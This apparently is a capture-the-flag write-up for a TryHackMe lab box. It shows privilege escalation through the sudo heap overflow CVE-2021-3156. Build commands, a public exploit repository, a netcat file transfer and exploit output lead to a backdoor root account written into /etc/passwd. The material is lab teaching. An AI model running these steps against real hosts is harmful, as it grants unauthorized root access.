CVE-2021-3156
PEAS has discovered that the target system is vulnerable to CVE-2021-3156
a vulnerability was found in sudo up to 1.8.31p2/1.9.5p1 (Operating System Utility Software). It has been rated as critical. This issue affects the function sudoers_policy_main. The manipulation with an unknown input leads to a heap-based overflow vulnerability. Using CWE to declare the problem leads to CWE-122. A heap overflow condition is a buffer overflow, where the buffer that can be overwritten is allocated in the heap portion of memory, generally meaning that the buffer was allocated using a routine such as malloc(). Impacted is confidentiality, integrity, and availability.
Exploit
Exploit found online
skyfuck@ubuntu:/dev/shm$ gcc
The program 'gcc' is currently not installed. To run 'gcc' please ask your administrator to install the package 'gcc'
skyfuck@ubuntu:/dev/shm$ cc
The program 'cc' can be found in the following packages:
* gcc
* clang
* tcc
Ask your administrator to install one of themNo compilers installed in the target system, opting out to remote compilation
Docker Exploit Development
┌──(kali㉿kali)-[~/archive/thm/tomghost]
└─$ docker run -it --entrypoint "/bin/bash" --name tomghost ubuntu:16.04
root@e7d4383510fe:/# ldd --version
ldd (Ubuntu GLIBC 2.23-0ubuntu11.3) 2.23
Copyright (C) 2016 Free Software Foundation, Inc.
This is free software; see the source for copying conditions. There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
Written by Roland McGrath and Ulrich Drepper.Setting up the Docker container to match the target environment; Ubuntu 16.04 and ldd (Ubuntu GLIBC 2.23-0ubuntu11) 2.23
root@e7d4383510fe:/# apt update -y ; apt install net-tools netcat nano gcc gcc-multilib make git wget -y ; cd rootInstalling the necessary packages
root@e7d4383510fe:~# git clone https://github.com/worawit/CVE-2021-3156 ; cd CVE-2021-3156
Cloning into 'CVE-2021-3156'...
remote: Enumerating objects: 86, done.
remote: Counting objects: 100% (18/18), done.
remote: Compressing objects: 100% (7/7), done.
remote: Total 86 (delta 16), reused 11 (delta 11), pack-reused 68
Unpacking objects: 100% (86/86), done.
Checking connectivity... done.Downloading the exploit repo
root@e7d4383510fe:~/CVE-2021-3156# gcc -O2 -o exploit_timestamp_race exploit_timestamp_race.c -ldl
exploit_timestamp_race.c: In function 'main':
exploit_timestamp_race.c:325:2: warning: ignoring return value of 'chdir', declared with attribute warn_unused_result [-Wunused-result]
chdir("/");
^
exploit_timestamp_race.c:326:2: warning: ignoring return value of 'system', declared with attribute warn_unused_result [-Wunused-result]
system("echo gg | su -c \"cp "BACKUP_FILE " " PASSWD_FILE ";rm -rf " WORKING_DIR "\" - gg ");
^
root@e7d4383510fe:~# tar -czf CVE-2021-3156.tar.gz CVE-2021-3156Compiling
Exploitation
root@e7d4383510fe:~# nc 10.10.198.73 2222 < CVE-2021-3156.tar.gz
skyfuck@ubuntu:/dev/shm$ nc -nlvp 2222 > CVE-2021-3156.tar.gz
Listening on [0.0.0.0] (family 0, port 2222)
Connection from [10.9.2.95] port 2222 [tcp/*] accepted (family 2, sport 36054)
skyfuck@ubuntu:/dev/shm$ tar -xf CVE-2021-3156.tar.gz ; cd CVE-2021-3156Delivery complete
skyfuck@ubuntu:/dev/shm/CVE-2021-3156$ python3 ./exploit_userspec.py
[...REDACTED...]
offset to first userspec: 0x370
cmnd size: 0x1230
offset to defaults: 0x60
offset to first userspec: 0x370
offset to userspec: 0x0
to skip finding offsets next time no this machine, run:
./exploit_userspec.py 0x1230 0x60 0x370 0x0
gg:$5$a$gemgwVPxLx/tdtByhncd4joKlMRYQ3IVwdoBXPACCL2:0:0:gg:/root:/bin/bash
success at 858Exploitation successful
skyfuck@ubuntu:/dev/shm/CVE-2021-3156$ su gg
Password:
root@ubuntu:/dev/shm/CVE-2021-3156# whoami
root
root@ubuntu:/dev/shm/CVE-2021-3156# hostname
ubuntu
root@ubuntu:/dev/shm/CVE-2021-3156# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 9001 qdisc pfifo_fast state UP group default qlen 1000
link/ether 02:e6:f7:17:b3:d5 brd ff:ff:ff:ff:ff:ff
inet 10.10.198.73/16 brd 10.10.255.255 scope global eth0
valid_lft forever preferred_lft forever
inet6 fe80::e6:f7ff:fe17:b3d5/64 scope link
valid_lft forever preferred_lft foreverSystem Level Compromise